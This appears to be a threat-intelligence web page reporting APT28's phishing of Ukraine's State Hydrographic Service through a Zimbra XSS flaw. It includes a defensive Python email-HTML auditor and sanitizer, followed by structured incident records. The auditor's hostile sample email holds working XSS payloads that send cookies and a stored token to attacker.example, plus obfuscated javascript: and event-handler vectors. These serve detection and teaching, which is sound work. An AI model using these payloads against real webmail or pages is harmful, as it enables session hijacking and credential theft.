Zimbra and Ukraine’s State Hydrographic Service: Russian hackers exploit Zimbra flaw to breach Ukrainian maritime agency

Russian APT28 Exploits Zimbra Flaw in Stealthy Phishing Attack on Ukrainian Agency

A Russian state-backed hacking group, APT28 (also known as Fancy Bear), targeted Ukraine’s State Hydrographic Service in a phishing campaign that exploited a cross-site scripting (XSS) vulnerability in Zimbra webmail. The attack, uncovered by cybersecurity firm Seqrite, leveraged CVE-2025-66376 to plant malicious code in the HTML body of an email, where attachment scanners and URL filters have nothing to flag.

Unlike conventional phishing attempts, the email contained no malicious attachments or links. It posed as a routine internship inquiry written in Ukrainian, with the exploit embedded directly in the message body. When the recipient opened it while logged in to Zimbra, the injected code ran silently inside the authenticated webmail session, letting the attackers harvest login credentials, session tokens, backup 2FA codes, stored passwords, and up to 90 days of mailbox data.

The malicious email was sent in January 2026 from a compromised student account. By running inside a trusted webmail session rather than dropping a payload, APT28 evaded detection: the authenticated session was hijacked without any malware for endpoint defenses to catch or any standard alert to trigger.
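The mechanics above are worth seeing from the defender's side. The following is an added example, not Seqrite's analysis or Zimbra's code, and it does not reproduce the CVE-2025-66376 trigger, which the report does not publish. It is a gateway-side audit of an email's text/html part that flags the generic ways HTML runs script when a webmail client renders it (script and other active elements, on* event handlers, javascript: hrefs including whitespace-obfuscated ones) and produces an allowlist-sanitized body that a client could render safely. The two sample messages, the hydro.example and attacker.example hosts, and the payloads are constructed for this example.

```python
"""Gateway-side audit of an email's HTML body for content that would execute if a
webmail client rendered it unsanitized, plus an allowlist sanitizer (added example)."""
import html
import re
from email import policy
from email.parser import BytesParser
from html.parser import HTMLParser

# Allowlist: what a mail client may render. Anything not listed is dropped.
ALLOWED_TAGS = {"p", "br", "div", "span", "b", "i", "u", "em", "strong", "a", "ul",
                "ol", "li", "blockquote", "h1", "h2", "h3", "table", "tr", "td", "th"}
ALLOWED_ATTRS = {"a": {"href"}, "td": {"colspan"}, "th": {"colspan"}}
# Elements that run script or load remote content when rendered. Those with a body
# get their whole subtree swallowed; the void ones are simply dropped.
ACTIVE_BLOCK = {"script", "style", "iframe", "object", "svg", "math", "form", "template"}
ACTIVE_VOID = {"img", "embed", "link", "meta", "base", "input"}


def _safe_url(value: str) -> bool:
    """Scheme allowlist. Browsers skip control chars/whitespace inside a scheme
    ("java\\nscript:"), so strip them first; no explicit http(s)/mailto scheme fails closed."""
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    return re.match(r"(?i)^(https?|mailto):", cleaned) is not None


class _Auditor(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings, self.out = [], []
        self._suppress = 0  # depth inside an ACTIVE_BLOCK subtree

    def handle_starttag(self, tag, attrs):
        attrs = [(name.lower(), value or "") for name, value in attrs]
        for name, _ in attrs:  # on* handlers are script no matter which tag carries them
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
        if tag in ACTIVE_BLOCK or tag in ACTIVE_VOID:
            self.findings.append(f"active content <{tag}>")
            if tag in ACTIVE_BLOCK:
                self._suppress += 1
            return
        if self._suppress or tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag itself, keep its text children
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # silently drops style=, src=, id=, on*= ...
            if name == "href" and not _safe_url(value):
                self.findings.append(f"unsafe href on <{tag}>: {value[:40]!r}")
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ACTIVE_BLOCK and self._suppress:
            self._suppress -= 1
        elif not self._suppress and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._suppress:  # script/style bodies also arrive here and are swallowed
            self.out.append(html.escape(data, quote=False))


def audit_email(raw: bytes):
    """Return (findings, sanitized_html) for a raw RFC 5322 message with a text/html part."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    part = msg.get_body(preferencelist=("html",))
    auditor = _Auditor()
    auditor.feed(part.get_content() if part is not None else "")
    auditor.close()
    return auditor.findings, "".join(auditor.out)


# Constructed samples (not the real lure): a plain internship inquiry, and the same
# pretext carrying generic XSS vectors with no attachment and no visible link.
BENIGN = b"""From: student@example.edu
Subject: Internship inquiry
Content-Type: text/html; charset=utf-8

<p>Good afternoon, I am a cartography student asking about
<a href="https://hydro.example/careers">internship</a> opportunities.</p>
"""

HOSTILE = b"""From: student@example.edu
Subject: Internship inquiry
Content-Type: text/html; charset=utf-8

<p>Good afternoon, I am a cartography student asking about internships.</p>
<img src="x" onerror="fetch('https://attacker.example/c?'+encodeURIComponent(document.cookie))">
<script>new Image().src='https://attacker.example/t?'+localStorage.getItem('token')</script>
<a href="java&#10;script:void(0)">Portfolio</a>
<svg onload="alert(document.domain)"></svg>
"""

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("hostile", HOSTILE)):
        print(label, audit_email(raw))
```

The design point is that the sanitizer is an allowlist that fails closed: a denylist that strips `<script>` and blocks hrefs starting with `javascript:` misses the `&#10;`-split scheme (which the parser unescapes to a newline the browser ignores) and the `onload` on an unexpected element such as `<svg>`. The findings list is what a gateway would alert on, since nothing about the message (no attachment, no link) otherwise distinguishes it from the benign inquiry.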

APT28, linked to Russia’s military intelligence, has a history of targeting Ukrainian and Western government entities, defense contractors, and logistics networks. Recent research also tied the group to operations involving new malware strains, BadPaw and MeowMeow. Zimbra webmail has been a recurring target for Russian-linked groups, including APT29 and Winter Vivern, in espionage campaigns across Eastern Europe.

Source: https://therecord.media/russia-hackers-ukraine-zimbra-breach

Zimbra cybersecurity rating report: https://www.rankiteo.com/company/zimbra

State Hydrographic Service of Ukraine cybersecurity rating report: https://www.rankiteo.com/company/state-hydrographic-service-of-ukraine

{
"id": "ZIMSTA1773930456",
"linkid": "zimbra, state-hydrographic-service-of-ukraine",
"type": "Vulnerability",
"date": "1/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"
}
{'affected_entities': [{'industry': 'Maritime, Hydrography',
                        'location': 'Ukraine',
                        'name': 'Ukraine’s State Hydrographic Service',
                        'type': 'Government Agency'}],
 'attack_vector': 'Cross-site scripting (XSS) in Zimbra webmail',
 'data_breach': {'data_exfiltration': 'Yes',
                 'personally_identifiable_information': 'Yes',
                 'sensitivity_of_data': 'High',
                 'type_of_data_compromised': 'Credentials, Session Tokens, 2FA '
                                             'Codes, Emails'},
 'description': 'A Russian state-backed hacking group, APT28 (also known as '
                'Fancy Bear), targeted Ukraine’s State Hydrographic Service in '
                'a sophisticated phishing campaign exploiting a cross-site '
                'scripting (XSS) vulnerability in Zimbra webmail. The attack '
                'leveraged CVE-2025-66376 to inject malicious code into an '
                'email’s HTML body, bypassing traditional security measures. '
                'The email contained no malicious attachments or links but '
                'executed silently when opened in an active Zimbra session, '
                'enabling attackers to harvest login credentials, session '
                'tokens, backup 2FA codes, stored passwords, and up to 90 days '
                'of mailbox data.',
 'impact': {'data_compromised': 'Login credentials, session tokens, backup 2FA '
                                'codes, stored passwords, 90 days of mailbox '
                                'data',
            'identity_theft_risk': 'High',
            'systems_affected': 'Zimbra webmail'},
 'initial_access_broker': {'entry_point': 'Compromised student email account'},
 'motivation': 'Espionage, Data Theft',
 'post_incident_analysis': {'root_causes': 'Exploitation of Zimbra XSS '
                                           'vulnerability (CVE-2025-66376), '
                                           'lack of detection for embedded '
                                           'malicious code in emails'},
 'references': [{'source': 'Seqrite'}],
 'response': {'third_party_assistance': 'Seqrite (cybersecurity firm)'},
 'threat_actor': 'APT28 (Fancy Bear)',
 'title': 'Russian APT28 Exploits Zimbra Flaw in Stealthy Phishing Attack on '
          'Ukrainian Agency',
 'type': 'Phishing, Espionage',
 'vulnerability_exploited': 'CVE-2025-66376'}